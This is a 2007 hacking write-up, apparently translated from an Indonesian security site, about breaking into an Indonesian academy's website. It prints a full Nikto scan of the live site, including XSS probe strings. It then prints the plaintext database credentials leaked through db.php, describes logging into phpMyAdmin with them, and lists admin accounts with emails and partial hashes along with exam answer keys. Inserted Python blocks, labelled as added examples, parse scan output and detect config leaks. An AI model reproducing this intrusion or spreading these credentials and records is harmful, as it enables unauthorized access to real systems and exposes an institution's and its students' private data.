www.sekuritionline.net
Articles
By cyberlog
Published: April 25, 2007

Akademi Bina Sarana Informatika is one of the largest academies in Indonesia, with campuses spread across many regions.

They run everything through an online system to simplify their educational administration: lecturer attendance, printing of study result cards, student payment status, and the complete records of tens of thousands of students can all be viewed through this website.

Here the author tries to analyse the online system deployed at www.bsi.ac.id by scanning their server with Nikto.pl.

 

=============================================

Vulnerable : Db.php

Type : High Risk

Original Idea : Crew #sekuritionline@dalnet ( anonymous )

Site : http://www.bsi.ac.id

=============================================

 

OK, to save time, let's start exploring the site www.bsi.ac.id!

The first thing to do is to have a shell account ready; log into it and download nikto.pl from http://cirt.net/nikto/nikto-current.tar.gz. Here are the details of how the site www.bsi.ac.id was explored:

==============

login as: root

root@bla-bla-bla.com's password:

Last login: Mon 2006

Last login: Mon 01:09:20

welcome:~# wget http://cirt.net/nikto/nikto-current.tar.gz

--01:19:06--  http://cirt.net/nikto/nikto-current.tar.gz

           => `nikto-current.tar.gz'

Resolving cirt.net... done.

Connecting to cirt.net[209.197.238.96]:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 192,642 [application/x-tar]

 

100%[======================================>] 192,642      184.98K/s    ETA 00:00

 

01:19:08 (184.98 KB/s) - `nikto-current.tar.gz' saved [192642/192642]

 

 

welcome:~# tar -xvzf nikto-current.tar.gz

nikto-1.35/

nikto-1.35/config.txt

nikto-1.35/docs/

nikto-1.35/docs/CHANGES.txt

nikto-1.35/docs/LICENSE.txt

nikto-1.35/docs/nikto-1.34.man

nikto-1.35/docs/nikto_usage.html

nikto-1.35/docs/nikto_usage.txt

nikto-1.35/docs/README_plugins.txt

nikto-1.35/nikto.pl

nikto-1.35/plugins/

nikto-1.35/plugins/LW.pm

nikto-1.35/plugins/nikto_apacheusers.plugin

nikto-1.35/plugins/nikto_core.plugin

nikto-1.35/plugins/nikto_headers.plugin

nikto-1.35/plugins/nikto_httpoptions.plugin

nikto-1.35/plugins/nikto_msgs.plugin

nikto-1.35/plugins/nikto_mutate.plugin

nikto-1.35/plugins/nikto_outdated.plugin

nikto-1.35/plugins/nikto_passfiles.plugin

nikto-1.35/plugins/nikto_plugin_order.txt

nikto-1.35/plugins/nikto_realms.plugin

nikto-1.35/plugins/nikto_robots.plugin

nikto-1.35/plugins/nikto_user_enum_apache.plugin

nikto-1.35/plugins/nikto_user_enum_cgiwrap.plugin

nikto-1.35/plugins/outdated.db

nikto-1.35/plugins/realms.db

nikto-1.35/plugins/scan_database.db

nikto-1.35/plugins/server_msgs.db

nikto-1.35/plugins/servers.db

nikto-1.35/versions.txt

welcome:~# cd /root/nikto-1.35

welcome:~/nikto-1.35# ./nikto.pl -update

+ Retrieving 'realms.db'

+ Retrieving 'server_msgs.db'

+ Retrieving 'nikto_headers.plugin'

+ Retrieving 'nikto_outdated.plugin'

+ Retrieving 'servers.db'

+ Retrieving 'scan_database.db'

+ Retrieving 'nikto_core.plugin'

+ Retrieving 'outdated.db'

+ Retrieving 'CHANGES.txt'

+ www.cirt.net message: Version 2.0 is still coming... Seriously.

 

================================================

Then run your favourite nikto:

==================================================

welcome:~/nikto-1.35# ./nikto.pl -h www.bsi.ac.id

---------------------------------------------------------------------------

- Nikto 1.35/1.36     -     www.cirt.net

+ Target IP:       203.130.232.140

+ Target Hostname: www.bsi.ac.id

+ Target Port:     80

+ Start Time:      Tue Dec 19 05:54:01 2006

---------------------------------------------------------------------------

- Scan is dependent on "Server" string which can be faked, use -g to override

+ Server: Apache 3 - POWERNET

- Retrieved X-Powered-By header: PHP/4.3.9

+ PHP/4.3.9 appears to be outdated (current is at least 5.1.4)

+ /~root - Enumeration of users is possible by requesting ~username (responds with Forbidden for real users, not found for non-existent users) (GET).

+ /icons/ - Directory indexing is enabled, it should only be enabled for specific directories (if required). If indexing is not used, the /icons directory should be removed. (GET)

+ /manual/images/ - Apache 2.0 directory indexing is enabled, it should only be enabled for specific directories (if required). Apache's manual should be removed and directory indexing disabled. (GET)

+ / - TRACE option appears to allow XSS or credential theft. See http://www.cgisecurity.com/whitehat-mirror/WhitePaper_screen.pdf for details (TRACE)

+ /admin.php?en_log_id=0&action=config - Needs Auth: (realm "BSI Admin, Authenticate Please"

+ /admin.php?en_log_id=0&action=users - Needs Auth: (realm "BSI Admin, Authenticate Please"

+ /config.php - Redirects to index.php , PHP Config file may contain database IDs and passwords.

+ /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB-12184. (GET)

+ /index.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB-12184. (GET)

+ /index.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB-12184. (GET)

+ /index.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 - PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings. OSVDB-12184. (GET)

+ /index.php?module=My_eGallery - My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection. (GET)

+ /index.php?top_message=&lt;script&gt;alert(document.cookie)&lt;/script&gt;  - Led-Forums allows any user to change the welcome message, and it is vulnerable to Cross Site Scripting (XSS). CA-2000-02. (GET)

+ /info.php - Contains PHP configuration information (GET)

+ /manual/ - Web server manual? tsk tsk. (GET)

+ /readme.txt - Default file found. (GET)

+ /\"><img%20src=\"javascript:alert(document.domain)\"> - The IBM Web Traffic Express Caching Proxy is vulnerable to Cross Site Scripting (XSS). CA-2000-02. (GET)

+ /admin.php - Needs Auth: (realm "BSI Admin, Authenticate Please"

+ /css - Redirects to http://www.bsi.ac.id/css/ , This might be interesting...

+ /db/ - This might be interesting... (GET)

+ /download/ - This might be interesting... (GET)

+ /img/ - This may be interesting... (GET)

+ /includes/ - This might be interesting... (GET)

+ /pages/ - This might be interesting... (GET)

+ /php/ - This might be interesting... (GET)

+ /phpmyadmin/ - This might be interesting... (GET)

+ /sql/ - This might be interesting... (GET)

+ Over 20 "OK" messages, this may be a by-product of the

            +     server answering all requests with a "200 OK" message. You should

            +     manually verify your results.

+ /db.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ /index.php?base=test%20 - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ /index.php?IDAdmin=test - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ /index.php?pymembs=admin - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ /index.php?SqlQuery=test%20 - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ /index.php?tampon=test%20 - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ /index.php?topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20 - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ /modules/Search/index.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET)

+ Over 20 "OK" messages, this may be a by-product of the

            +     server answering all requests with a "200 OK" message. You should

            +     manually verify your results.

+ 2673 items checked - 30 item(s) found on remote host(s)

+ End Time:        Tue Dec 19 06:44:55 2006 (3054 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested

welcome:~/nikto-1.35#

============================================================

Our task now is to try out, one by one, the vulnerabilities found on www.bsi.ac.id.

============================================================
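Working through 30 findings by hand is error-prone, and Nikto itself warns in the output above that the server may be answering everything with "200 OK". The following Python, an added example that is not part of the original article, parses Nikto 1.x text output like the scan above into categorised findings and carries that warning through, so the "might be interesting" hits are not reported before they are verified. The sample lines are copied from the scan output above; the category names and triage rules are the example's own.

```python
import re
# Constructed sample in the Nikto 1.x text format shown above; paths are copied from the article's scan.
SAMPLE_NIKTO_OUTPUT = """\
+ /icons/ - Directory indexing is enabled, it should only be enabled for specific directories (if required). (GET)
+ / - TRACE option appears to allow XSS or credential theft. (TRACE)
+ /admin.php - Needs Auth: (realm "BSI Admin, Authenticate Please"
+ /config.php - Redirects to index.php , PHP Config file may contain database IDs and passwords.
+ /info.php - Contains PHP configuration information (GET)
+ /phpmyadmin/ - This might be interesting... (GET)
+ /db.php - This might be interesting... has been seen in web logs from an unknown scanner. (GET)
+ Over 20 "OK" messages, this may be a by-product of the
            +     server answering all requests with a "200 OK" message. You should
            +     manually verify your results.
+ 2673 items checked - 30 item(s) found on remote host(s)
"""
# "+ /path - message (METHOD)"; the trailing method is absent on some lines.
FINDING_RE = re.compile(r"^\+ (?P<path>/\S*) - (?P<msg>.*?)(?: \((?P<method>[A-Z]+)\))?$")
# Ordered triage rules, first match wins; config/source exposure ranks high because
# that class of finding (db.php) is what gave up credentials in the article.
RULES = [
    ("info-disclosure", re.compile(r"phpinfo|configuration information|PHPE9568F|PHPB8B5F", re.I)),
    ("config-exposure", re.compile(r"db\.php|config|\.inc\b|\.bak\b|\.sql\b|/sql/|/db/|/includes/", re.I)),
    ("admin-interface", re.compile(r"phpmyadmin|admin|Needs Auth", re.I)),
    ("dir-indexing", re.compile(r"directory indexing", re.I)),
    ("http-method", re.compile(r"TRACE option", re.I)),
    ("unverified", re.compile(r"might be interesting|may be interesting", re.I)),
]

def parse_nikto(text):
    # Returns (findings, warned); warned is True when Nikto flagged blanket "200 OK" answers.
    findings, warned = [], False
    for raw in text.splitlines():
        line = raw.strip()
        if 'Over 20 "OK" messages' in line:
            warned = True
            continue
        m = FINDING_RE.match(line)
        if not m:
            continue  # banner, header, continuation and summary lines carry no path
        category = next((n for n, rx in RULES if rx.search(f"{m['path']} {m['msg']}")), "other")
        findings.append({"path": m["path"], "method": m["method"] or "GET", "category": category})
    return findings, warned

def triage(text):
    # Paths per category; verify_manually mirrors the scan's own 200-OK warning.
    findings, warned = parse_nikto(text)
    cats = {f["category"] for f in findings}
    return {"by_category": {c: [f["path"] for f in findings if f["category"] == c] for c in cats},
            "verify_manually": warned}
```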

Hehehe, that's a lot of vulnerabilities. OK, the first one we'll check is www.bsi.ac.id/db.php

[Image: the BSI database login and password as displayed in the browser]

Wow!!! I don't believe it??? The database login and password are plainly visible; the contents of db.php are displayed as text:

ST", "localhost"; define("USER", "1385"; define("PASS", "101101"; define("DB", "db1385n1"; ?>

OK, time to get into the database of one of the largest academies in Indonesia. Let's go to the party :)

www.bsi.ac.id/phpmyadmin

user : 1385

pass : 101101

[Image: the initial view of the BSI database]



Wow, it turns out we can get inside as well and browse the academy's important data. (Imagine if irresponsible people, or people who want to profit from this weakness, got in there. It is hard to imagine how much data could be stolen.)

budiprasetyo  God                http://bsi.ac.id      budi_prasetyo@bsi.ac.id       2ca41752ccf4dbdb76d8fe88c48xxxxx [ md5 hash ]

bimosadewo  bimosadewo         www.bsi.ac.id      budi_prasetyo@indo.net.id       2ca41752ccf4dbdb76d8fe88c48xxxxx [ md5 hash ] 

webmaster  Web Master BSI         www.bsi.ac.id      admin@bsi.ac.id               237efd9bbf866189be3a3055515xxxxx [ md5 hash ]  

webadmin  Web Administrator      www.bsi.ac.id      webmaseter@bsi.ac.id       237efd9bbf866189be3a3055515xxxxx [ md5 hash ] 

And it turns out the exam answer keys are in there too:

kd_ujn  jml_soal  nilai_soal  knc_jwb
1021    25        4.00        DDAEDCBBACBCBABCAABBCDCAD
1022    25        4.00        DBCBBBBABADDDCABAACDCBDCD
1023    25        4.00        BBADBBDCDAACBBBCDBBBBDBBC
1024    25        4.00        DDAEDCBBACDDDCABAACDBDBBC
1025    25        4.00        DBCBCDCCCBBCBBBBCADDDCAAD
1026    25        4.00        CDDADBDDBBBCCCCCADACDCCCB
1041    30        3.33        BCBBBDAAAAABCDCABDDCCBACBBABDB
1042    30        3.33        CBCADCCCCABACCBCDCAADCCADABABB
1043    30        3.33        DDCCAACCAACACACBBCBCBACADCBABB
1044    30        3.33        BCADBDBAABAABBBDBBDADBDDCBBBAD
1045    30        3.33        DDCCAACCAAABCDCABDDCDBDDCBBBAD
1046    30        3.33        CBCADCCCCAAABBCDBBDABACADCBABB

 

Note:

-     Admins, please pay closer attention to the security of the server, and

-     as of now the bug at the URL www.bsi.ac.id/phpmyadmin has been closed by the admin, who no longer allows any IP address other than the admin's own to connect.

-     We only penetrated the system; we did not damage or take your data. If anyone takes data from, or adds data to, the database on your server, it was not us who did it.

-     At the time of writing, the file named db.php can still be accessed by the general public (admins, please check the permissions on that file).
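The note above asks the admin to check db.php. One way to verify such a fix, as an added example that is not part of the original article: fetch the config URL and inspect the response body. A config include that executes correctly returns an empty body, while visible define() calls (with or without their closing parenthesis, as in the truncated capture above) mean the source is being served as text and every credential in it has to be rotated. The sample bodies and constant values below are constructed placeholders.

```python
import re

# Constructed response bodies (no real host was contacted; values are placeholders).
# LEAKED_BODY mimics a PHP config file served as text, the way db.php appears above;
# TRUNCATED_BODY mimics the cut-off capture in the article, with no closing parentheses.
LEAKED_BODY = ('<?php define("HOST", "localhost"); define("USER", "example_user"); '
               'define("PASS", "example-secret"); define("DB", "example_db"); ?>')
TRUNCATED_BODY = ('ST", "localhost"; define("USER", "example_user"; '
                  'define("PASS", "example-secret"; define("DB", "example_db"; ?>')
HTML_BODY = "<html><body><h1>Login</h1></body></html>"

# define("NAME", "value") with the closing parenthesis optional, so the truncated form still matches.
DEFINE_RE = re.compile(r"""define\(\s*["'](\w+)["']\s*,\s*["']([^"']*)["']""", re.I)
SECRET_NAMES = re.compile(r"pass|pwd|secret|token|key", re.I)

def leaked_php_constants(body):
    # Map of constant name -> value for define() calls visible in the body; credential-like
    # values are redacted so the finding can be filed without copying the secret around.
    if not ("<?" in body or "?>" in body or "define(" in body.lower()):
        return {}
    return {name: ("<redacted>" if SECRET_NAMES.search(name) else value)
            for name, value in DEFINE_RE.findall(body)}

def classify_response(body):
    # A config include that executes correctly returns an empty body; visible define()
    # calls mean the file was served as source and every credential in it must be rotated.
    if leaked_php_constants(body):
        return "source-leak"
    return "empty" if not body.strip() else "content"
```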

 
Thanks to:

Allah SWT & the Prophet Muhammad SAW, My Family,

Thebig`s Family #sekuritionline@dalnet, Jasakom Community and all Crew www.sekuritionline.com
